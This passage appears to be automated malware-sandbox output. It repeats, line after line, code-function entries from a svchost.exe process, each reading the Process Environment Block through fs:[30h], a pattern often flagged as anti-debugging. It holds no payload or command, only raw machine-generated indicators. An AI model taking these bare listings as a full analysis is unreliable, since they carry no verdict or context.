            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A2E388 mov eax, dword ptr fs:[00000030h] | 2_2_03A2E388
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A5438F mov eax, dword ptr fs:[00000030h] | 2_2_03A5438F
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B0539D mov eax, dword ptr fs:[00000030h] | 2_2_03B0539D
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A8739A mov eax, dword ptr fs:[00000030h] | 2_2_03A8739A
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A28397 mov eax, dword ptr fs:[00000030h] | 2_2_03A28397
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AEF3E6 mov eax, dword ptr fs:[00000030h] | 2_2_03AEF3E6
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B053FC mov eax, dword ptr fs:[00000030h] | 2_2_03B053FC
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A403E9 mov eax, dword ptr fs:[00000030h] | 2_2_03A403E9
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A4E3F0 mov eax, dword ptr fs:[00000030h] | 2_2_03A4E3F0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A663FF mov eax, dword ptr fs:[00000030h] | 2_2_03A663FF
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AEC3CD mov eax, dword ptr fs:[00000030h] | 2_2_03AEC3CD
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A3A3C0 mov eax, dword ptr fs:[00000030h] | 2_2_03A3A3C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A383C0 mov eax, dword ptr fs:[00000030h] | 2_2_03A383C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AB63C0 mov eax, dword ptr fs:[00000030h] | 2_2_03AB63C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AEB3D0 mov ecx, dword ptr fs:[00000030h] | 2_2_03AEB3D0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AF132D mov eax, dword ptr fs:[00000030h] | 2_2_03AF132D
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A5F32A mov eax, dword ptr fs:[00000030h] | 2_2_03A5F32A
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A27330 mov eax, dword ptr fs:[00000030h] | 2_2_03A27330
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AB930B mov eax, dword ptr fs:[00000030h] | 2_2_03AB930B
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A6A30B mov eax, dword ptr fs:[00000030h] | 2_2_03A6A30B
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A2C310 mov ecx, dword ptr fs:[00000030h] | 2_2_03A2C310
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A50310 mov ecx, dword ptr fs:[00000030h] | 2_2_03A50310
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AEF367 mov eax, dword ptr fs:[00000030h] | 2_2_03AEF367
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AD437C mov eax, dword ptr fs:[00000030h] | 2_2_03AD437C
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A37370 mov eax, dword ptr fs:[00000030h] | 2_2_03A37370
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AB2349 mov eax, dword ptr fs:[00000030h] | 2_2_03AB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB2349 mov eax, dword ptr fs:[00000030h]2_2_03AB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB2349 mov eax, dword ptr fs:[00000030h]2_2_03AB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB2349 mov eax, dword ptr fs:[00000030h]2_2_03AB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB2349 mov eax, dword ptr fs:[00000030h]2_2_03AB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB2349 mov eax, dword ptr fs:[00000030h]2_2_03AB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB2349 mov eax, dword ptr fs:[00000030h]2_2_03AB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB2349 mov eax, dword ptr fs:[00000030h]2_2_03AB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB2349 mov eax, dword ptr fs:[00000030h]2_2_03AB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB2349 mov eax, dword ptr fs:[00000030h]2_2_03AB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB2349 mov eax, dword ptr fs:[00000030h]2_2_03AB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB2349 mov eax, dword ptr fs:[00000030h]2_2_03AB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2D34C mov eax, dword ptr fs:[00000030h]2_2_03A2D34C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2D34C mov eax, dword ptr fs:[00000030h]2_2_03A2D34C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B05341 mov eax, dword ptr fs:[00000030h]2_2_03B05341
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A29353 mov eax, dword ptr fs:[00000030h]2_2_03A29353
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A29353 mov eax, dword ptr fs:[00000030h]2_2_03A29353
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB035C mov eax, dword ptr fs:[00000030h]2_2_03AB035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB035C mov eax, dword ptr fs:[00000030h]2_2_03AB035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB035C mov eax, dword ptr fs:[00000030h]2_2_03AB035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB035C mov ecx, dword ptr fs:[00000030h]2_2_03AB035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB035C mov eax, dword ptr fs:[00000030h]2_2_03AB035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB035C mov eax, dword ptr fs:[00000030h]2_2_03AB035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AFA352 mov eax, dword ptr fs:[00000030h]2_2_03AFA352
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A402A0 mov eax, dword ptr fs:[00000030h]2_2_03A402A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A402A0 mov eax, dword ptr fs:[00000030h]2_2_03A402A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A452A0 mov eax, dword ptr fs:[00000030h]2_2_03A452A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A452A0 mov eax, dword ptr fs:[00000030h]2_2_03A452A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A452A0 mov eax, dword ptr fs:[00000030h]2_2_03A452A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A452A0 mov eax, dword ptr fs:[00000030h]2_2_03A452A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AF92A6 mov eax, dword ptr fs:[00000030h]2_2_03AF92A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AF92A6 mov eax, dword ptr fs:[00000030h]2_2_03AF92A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AF92A6 mov eax, dword ptr fs:[00000030h]2_2_03AF92A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AF92A6 mov eax, dword ptr fs:[00000030h]2_2_03AF92A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AC62A0 mov eax, dword ptr fs:[00000030h]2_2_03AC62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AC62A0 mov ecx, dword ptr fs:[00000030h]2_2_03AC62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AC62A0 mov eax, dword ptr fs:[00000030h]2_2_03AC62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AC62A0 mov eax, dword ptr fs:[00000030h]2_2_03AC62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AC62A0 mov eax, dword ptr fs:[00000030h]2_2_03AC62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AC62A0 mov eax, dword ptr fs:[00000030h]2_2_03AC62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AC72A0 mov eax, dword ptr fs:[00000030h]2_2_03AC72A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AC72A0 mov eax, dword ptr fs:[00000030h]2_2_03AC72A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB92BC mov eax, dword ptr fs:[00000030h]2_2_03AB92BC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB92BC mov eax, dword ptr fs:[00000030h]2_2_03AB92BC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB92BC mov ecx, dword ptr fs:[00000030h]2_2_03AB92BC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB92BC mov ecx, dword ptr fs:[00000030h]2_2_03AB92BC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6E284 mov eax, dword ptr fs:[00000030h]2_2_03A6E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6E284 mov eax, dword ptr fs:[00000030h]2_2_03A6E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB0283 mov eax, dword ptr fs:[00000030h]2_2_03AB0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB0283 mov eax, dword ptr fs:[00000030h]2_2_03AB0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB0283 mov eax, dword ptr fs:[00000030h]2_2_03AB0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B05283 mov eax, dword ptr fs:[00000030h]2_2_03B05283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6329E mov eax, dword ptr fs:[00000030h]2_2_03A6329E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6329E mov eax, dword ptr fs:[00000030h]2_2_03A6329E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE12ED mov eax, dword ptr fs:[00000030h]2_2_03AE12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE12ED mov eax, dword ptr fs:[00000030h]2_2_03AE12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE12ED mov eax, dword ptr fs:[00000030h]2_2_03AE12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE12ED mov eax, dword ptr fs:[00000030h]2_2_03AE12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE12ED mov eax, dword ptr fs:[00000030h]2_2_03AE12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE12ED mov eax, dword ptr fs:[00000030h]2_2_03AE12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE12ED mov eax, dword ptr fs:[00000030h]2_2_03AE12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE12ED mov eax, dword ptr fs:[00000030h]2_2_03AE12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE12ED mov eax, dword ptr fs:[00000030h]2_2_03AE12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE12ED mov eax, dword ptr fs:[00000030h]2_2_03AE12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE12ED mov eax, dword ptr fs:[00000030h]2_2_03AE12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE12ED mov eax, dword ptr fs:[00000030h]2_2_03AE12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE12ED mov eax, dword ptr fs:[00000030h]2_2_03AE12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE12ED mov eax, dword ptr fs:[00000030h]2_2_03AE12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A402E1 mov eax, dword ptr fs:[00000030h]2_2_03A402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A402E1 mov eax, dword ptr fs:[00000030h]2_2_03A402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A402E1 mov eax, dword ptr fs:[00000030h]2_2_03A402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B052E2 mov eax, dword ptr fs:[00000030h]2_2_03B052E2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AEF2F8 mov eax, dword ptr fs:[00000030h]2_2_03AEF2F8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A292FF mov eax, dword ptr fs:[00000030h]2_2_03A292FF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3A2C3 mov eax, dword ptr fs:[00000030h]2_2_03A3A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3A2C3 mov eax, dword ptr fs:[00000030h]2_2_03A3A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3A2C3 mov eax, dword ptr fs:[00000030h]2_2_03A3A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3A2C3 mov eax, dword ptr fs:[00000030h]2_2_03A3A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3A2C3 mov eax, dword ptr fs:[00000030h]2_2_03A3A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5B2C0 mov eax, dword ptr fs:[00000030h]2_2_03A5B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5B2C0 mov eax, dword ptr fs:[00000030h]2_2_03A5B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5B2C0 mov eax, dword ptr fs:[00000030h]2_2_03A5B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5B2C0 mov eax, dword ptr fs:[00000030h]2_2_03A5B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5B2C0 mov eax, dword ptr fs:[00000030h]2_2_03A5B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5B2C0 mov eax, dword ptr fs:[00000030h]2_2_03A5B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5B2C0 mov eax, dword ptr fs:[00000030h]2_2_03A5B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A392C5 mov eax, dword ptr fs:[00000030h]2_2_03A392C5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A392C5 mov eax, dword ptr fs:[00000030h]2_2_03A392C5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2B2D3 mov eax, dword ptr fs:[00000030h]2_2_03A2B2D3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2B2D3 mov eax, dword ptr fs:[00000030h]2_2_03A2B2D3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2B2D3 mov eax, dword ptr fs:[00000030h]2_2_03A2B2D3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5F2D0 mov eax, dword ptr fs:[00000030h]2_2_03A5F2D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5F2D0 mov eax, dword ptr fs:[00000030h]2_2_03A5F2D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B05227 mov eax, dword ptr fs:[00000030h]2_2_03B05227
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2823B mov eax, dword ptr fs:[00000030h]2_2_03A2823B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A67208 mov eax, dword ptr fs:[00000030h]2_2_03A67208
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A67208 mov eax, dword ptr fs:[00000030h]2_2_03A67208
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A34260 mov eax, dword ptr fs:[00000030h]2_2_03A34260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A34260 mov eax, dword ptr fs:[00000030h]2_2_03A34260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A34260 mov eax, dword ptr fs:[00000030h]2_2_03A34260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AFD26B mov eax, dword ptr fs:[00000030h]2_2_03AFD26B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AFD26B mov eax, dword ptr fs:[00000030h]2_2_03AFD26B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2826B mov eax, dword ptr fs:[00000030h]2_2_03A2826B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A59274 mov eax, dword ptr fs:[00000030h]2_2_03A59274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A71270 mov eax, dword ptr fs:[00000030h]2_2_03A71270
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A71270 mov eax, dword ptr fs:[00000030h]2_2_03A71270
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE0274 mov eax, dword ptr fs:[00000030h]2_2_03AE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE0274 mov eax, dword ptr fs:[00000030h]2_2_03AE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE0274 mov eax, dword ptr fs:[00000030h]2_2_03AE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE0274 mov eax, dword ptr fs:[00000030h]2_2_03AE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE0274 mov eax, dword ptr fs:[00000030h]2_2_03AE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE0274 mov eax, dword ptr fs:[00000030h]2_2_03AE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE0274 mov eax, dword ptr fs:[00000030h]2_2_03AE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE0274 mov eax, dword ptr fs:[00000030h]2_2_03AE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE0274 mov eax, dword ptr fs:[00000030h]2_2_03AE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE0274 mov eax, dword ptr fs:[00000030h]2_2_03AE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE0274 mov eax, dword ptr fs:[00000030h]2_2_03AE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE0274 mov eax, dword ptr fs:[00000030h]2_2_03AE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A29240 mov eax, dword ptr fs:[00000030h]2_2_03A29240
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A29240 mov eax, dword ptr fs:[00000030h]2_2_03A29240
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB8243 mov eax, dword ptr fs:[00000030h]2_2_03AB8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB8243 mov ecx, dword ptr fs:[00000030h]2_2_03AB8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6724D mov eax, dword ptr fs:[00000030h]2_2_03A6724D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2A250 mov eax, dword ptr fs:[00000030h]2_2_03A2A250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AEB256 mov eax, dword ptr fs:[00000030h]2_2_03AEB256
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AEB256 mov eax, dword ptr fs:[00000030h]2_2_03AEB256
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A36259 mov eax, dword ptr fs:[00000030h]2_2_03A36259
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE11A4 mov eax, dword ptr fs:[00000030h]2_2_03AE11A4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE11A4 mov eax, dword ptr fs:[00000030h]2_2_03AE11A4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE11A4 mov eax, dword ptr fs:[00000030h]2_2_03AE11A4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE11A4 mov eax, dword ptr fs:[00000030h]2_2_03AE11A4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A4B1B0 mov eax, dword ptr fs:[00000030h]2_2_03A4B1B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A70185 mov eax, dword ptr fs:[00000030h]2_2_03A70185
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AEC188 mov eax, dword ptr fs:[00000030h]2_2_03AEC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AEC188 mov eax, dword ptr fs:[00000030h]2_2_03AEC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB019F mov eax, dword ptr fs:[00000030h]2_2_03AB019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB019F mov eax, dword ptr fs:[00000030h]2_2_03AB019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB019F mov eax, dword ptr fs:[00000030h]2_2_03AB019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB019F mov eax, dword ptr fs:[00000030h]2_2_03AB019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2A197 mov eax, dword ptr fs:[00000030h]2_2_03A2A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2A197 mov eax, dword ptr fs:[00000030h]2_2_03A2A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2A197 mov eax, dword ptr fs:[00000030h]2_2_03A2A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A87190 mov eax, dword ptr fs:[00000030h]2_2_03A87190
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A551EF mov eax, dword ptr fs:[00000030h]2_2_03A551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A551EF mov eax, dword ptr fs:[00000030h]2_2_03A551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A551EF mov eax, dword ptr fs:[00000030h]2_2_03A551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A551EF mov eax, dword ptr fs:[00000030h]2_2_03A551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A551EF mov eax, dword ptr fs:[00000030h]2_2_03A551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A551EF mov eax, dword ptr fs:[00000030h]2_2_03A551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A551EF mov eax, dword ptr fs:[00000030h]2_2_03A551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A551EF mov eax, dword ptr fs:[00000030h]2_2_03A551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A551EF mov eax, dword ptr fs:[00000030h]2_2_03A551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A551EF mov eax, dword ptr fs:[00000030h]2_2_03A551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A551EF mov eax, dword ptr fs:[00000030h]2_2_03A551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A551EF mov eax, dword ptr fs:[00000030h]2_2_03A551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A551EF mov eax, dword ptr fs:[00000030h]2_2_03A551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A351ED mov eax, dword ptr fs:[00000030h]2_2_03A351ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AD71F9 mov esi, dword ptr fs:[00000030h]2_2_03AD71F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B061E5 mov eax, dword ptr fs:[00000030h]2_2_03B061E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A601F8 mov eax, dword ptr fs:[00000030h]2_2_03A601F8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AF61C3 mov eax, dword ptr fs:[00000030h]2_2_03AF61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AF61C3 mov eax, dword ptr fs:[00000030h]2_2_03AF61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6D1D0 mov eax, dword ptr fs:[00000030h]2_2_03A6D1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6D1D0 mov ecx, dword ptr fs:[00000030h]2_2_03A6D1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AAE1D0 mov eax, dword ptr fs:[00000030h]2_2_03AAE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AAE1D0 mov eax, dword ptr fs:[00000030h]2_2_03AAE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AAE1D0 mov ecx, dword ptr fs:[00000030h]2_2_03AAE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AAE1D0 mov eax, dword ptr fs:[00000030h]2_2_03AAE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AAE1D0 mov eax, dword ptr fs:[00000030h]2_2_03AAE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B051CB mov eax, dword ptr fs:[00000030h]2_2_03B051CB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A60124 mov eax, dword ptr fs:[00000030h]2_2_03A60124
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A31131 mov eax, dword ptr fs:[00000030h]2_2_03A31131
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A31131 mov eax, dword ptr fs:[00000030h]2_2_03A31131
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2B136 mov eax, dword ptr fs:[00000030h]2_2_03A2B136
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2B136 mov eax, dword ptr fs:[00000030h]2_2_03A2B136
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2B136 mov eax, dword ptr fs:[00000030h]2_2_03A2B136
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2B136 mov eax, dword ptr fs:[00000030h]2_2_03A2B136
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ADA118 mov ecx, dword ptr fs:[00000030h]2_2_03ADA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ADA118 mov eax, dword ptr fs:[00000030h]2_2_03ADA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ADA118 mov eax, dword ptr fs:[00000030h]2_2_03ADA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ADA118 mov eax, dword ptr fs:[00000030h]2_2_03ADA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AF0115 mov eax, dword ptr fs:[00000030h]2_2_03AF0115
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2F172 mov eax, dword ptr fs:[00000030h]2_2_03A2F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2F172 mov eax, dword ptr fs:[00000030h]2_2_03A2F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2F172 mov eax, dword ptr fs:[00000030h]2_2_03A2F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2F172 mov eax, dword ptr fs:[00000030h]2_2_03A2F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2F172 mov eax, dword ptr fs:[00000030h]2_2_03A2F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2F172 mov eax, dword ptr fs:[00000030h]2_2_03A2F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2F172 mov eax, dword ptr fs:[00000030h]2_2_03A2F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2F172 mov eax, dword ptr fs:[00000030h]2_2_03A2F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2F172 mov eax, dword ptr fs:[00000030h]2_2_03A2F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2F172 mov eax, dword ptr fs:[00000030h]2_2_03A2F172
